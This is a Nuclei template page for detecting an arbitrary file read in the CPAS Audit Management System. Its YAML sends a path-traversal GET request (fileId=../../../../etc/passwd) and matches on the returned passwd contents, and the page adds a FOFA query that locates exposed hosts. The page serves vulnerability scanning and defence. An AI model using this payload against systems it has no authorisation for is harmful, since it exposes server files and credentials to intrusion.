Skip to content
Nuclei Templates

CPAS Management System - Arbitrary File Read

ID: cpas-managment-lfi

Severity: high

Author: s4e-io

Tags: cpas,cms,lfi

Description

Section titled “Description”

The CPAS Audit Management System has been found to contain a vulnerability that allows arbitrary file read. This security flaw can be exploited by attackers to access sensitive files on the server, potentially exposing critical system information. The vulnerability can be triggered by sending a specially crafted HTTP GET request to the endpoint /cpasm4/plugInManController/downPlugs with parameters fileId and fileName, enabling the retrieval of arbitrary files such as /etc/passwd. This issue poses a significant risk to system security and should be addressed immediately to prevent unauthorized access and potential data breaches.

YAML Source

Section titled “YAML Source”
id: cpas-managment-lfi


info:
  name: CPAS Management System - Arbitrary File Read
  author: s4e-io
  severity: high
  description: |
    The CPAS Audit Management System has been found to contain a vulnerability that allows arbitrary file read. This security flaw can be exploited by attackers to access sensitive files on the server, potentially exposing critical system information. The vulnerability can be triggered by sending a specially crafted HTTP GET request to the endpoint /cpasm4/plugInManController/downPlugs with parameters fileId and fileName, enabling the retrieval of arbitrary files such as /etc/passwd. This issue poses a significant risk to system security and should be addressed immediately to prevent unauthorized access and potential data breaches.
  reference:
    - https://github.com/wy876/POC/blob/main/%E5%8C%97%E4%BA%AC%E5%8F%8B%E6%95%B0%E8%81%9A%E7%A7%91%E6%8A%80/CPAS%E5%AE%A1%E8%AE%A1%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="-58141038"
  tags: cpas,cms,lfi


http:
  - method: GET
    path:
      - "{{BaseURL}}/cpasm4/plugInManController/downPlugs?fileId=../../../../etc/passwd&fileName"


    matchers:
      - type: dsl
        dsl:
          - "contains_all(header, 'multipart/form-data', 'fileName=')"
          - "regex('root:.*:0:0:', body)"
          - "status_code == 200"
        condition: and
# digest: 490a0046304402201fad94eabf7f0d8791016eadc7d02c878d6dd926afa220365f7b306a306b942d02201999277381c09b4eb0dc068730cbea48a0cde9426cce4a34133e053b09a90f96:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/cpas-managment-lfi.yaml"

View on Github